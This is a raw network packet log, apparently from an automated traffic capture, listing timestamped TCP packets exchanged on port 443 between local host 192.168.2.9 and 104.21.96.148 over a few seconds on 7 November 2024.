                                                                                                                                                                                                Nov 7, 2024 17:56:26.638317108 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.638354063 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:26.718625069 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.718643904 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.718769073 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:26.718776941 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.718821049 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:26.759793043 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.759818077 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.759972095 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:26.759985924 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.760030031 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:26.760226965 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.760273933 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.760288000 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:26.760297060 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.760344028 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:26.760344028 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:26.760353088 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.760395050 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.760436058 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:26.760888100 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:26.788506985 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:26.788537979 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.788636923 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:26.788876057 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:26.788886070 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:27.408571005 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:27.409933090 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:27.409948111 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.003774881 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.003818035 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.003845930 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.003875017 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.003901958 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.003928900 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.003941059 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.003963947 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.003978014 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.003983974 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.004410982 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.004616976 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.004666090 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.004671097 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.004750967 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.122695923 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.122925997 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.122992992 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.123008966 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.123016119 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.123059988 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.149528027 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.149573088 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.149661064 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.149666071 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.150137901 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.150214911 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.150218964 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.198877096 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.198887110 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.242496014 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.242537975 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.242748022 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.242757082 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.242799997 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.269001007 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.269072056 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.269118071 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.269155025 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.269165039 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.269355059 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.269406080 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.269412041 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.269452095 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.288587093 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.339566946 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.339576006 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.361763000 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.361793995 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.361994028 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.361999989 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.362052917 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.388204098 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.388361931 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.388437986 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.388501883 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.388513088 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.389214993 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.389219999 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.407987118 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.408255100 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.408263922 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.448827028 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.480768919 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.480776072 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.480832100 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.507586956 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.507601976 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.507667065 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.507709026 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.507715940 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.507756948 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.527241945 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.527250051 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.527328014 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.600167036 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.600178957 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.600328922 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.627496958 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.627506018 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.627538919 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.627629995 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.627638102 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.627682924 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.646943092 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.646985054 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.647022009 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.647030115 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.647053003 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.698954105 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.719964027 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.719971895 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.720174074 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.747365952 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.747375965 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.747483969 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.747673035 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.747680902 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.747726917 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.767083883 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.767246962 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.767254114 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.767322063 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.839441061 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.839448929 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.839654922 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.866791964 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.866801977 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.867002964 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.867183924 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.867240906 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.886637926 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.886854887 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.887059927 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.887109995 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.958867073 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.958935022 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.986219883 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.986294985 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.986581087 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.986630917 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.006247044 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.006299019 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.049310923 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.049365044 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.078094959 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.078150988 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.105741978 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.105815887 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.106117010 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.106168032 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.125463963 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.125662088 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.168616056 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.168790102 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.197418928 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.197530985 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.225426912 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.225466013 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.225511074 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.225521088 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.225558996 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.244813919 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.244921923 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.288009882 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.288108110 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.288117886 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.288167953 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.316931963 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.317034960 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.344628096 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.344696045 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.364366055 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.364463091 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.406713009 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.406790972 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.407470942 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.407531977 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.436397076 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.436618090 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.483860016 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.483867884 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.483891964 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.484040022 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.484040022 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.484047890 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.527090073 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.571819067 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.571826935 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.571861029 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.572160959 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.572169065 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.572216034 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.646020889 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.646050930 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.646091938 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.646097898 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.646120071 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.646131039 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.723014116 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.723035097 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.723090887 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.723100901 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.723124027 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.723143101 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.811275959 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.811295986 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.811367989 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.811374903 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.811409950 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.843406916 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.843424082 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.843516111 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.843523026 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.844918966 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.908296108 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.908358097 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.962579012 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.962600946 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.962667942 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.962676048 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.962724924 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.027635098 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.027677059 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.027709007 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.027715921 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.027760029 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.061996937 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.062031031 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.062055111 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.062060118 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.062134027 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.062139034 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.105062008 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.147054911 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.147074938 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.147125006 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.147130966 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.147182941 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.201150894 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.201200008 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.201225996 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.201234102 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.201277018 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.201286077 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.266736031 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.266757965 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.266840935 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.266848087 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.266882896 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.320458889 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.320477009 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.320563078 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.320569992 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.320729017 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.386157036 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.386178970 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.386279106 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.386287928 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.386348963 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.447005987 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.447071075 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.447365046 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.447432041 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.505450964 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.505472898 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.505532026 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.505541086 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.507406950 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.539926052 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.539947033 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.540009022 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.540016890 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.540045977 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.540064096 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.590785027 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.590805054 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.590889931 CET49925443192.168.2.9104.21.96.148
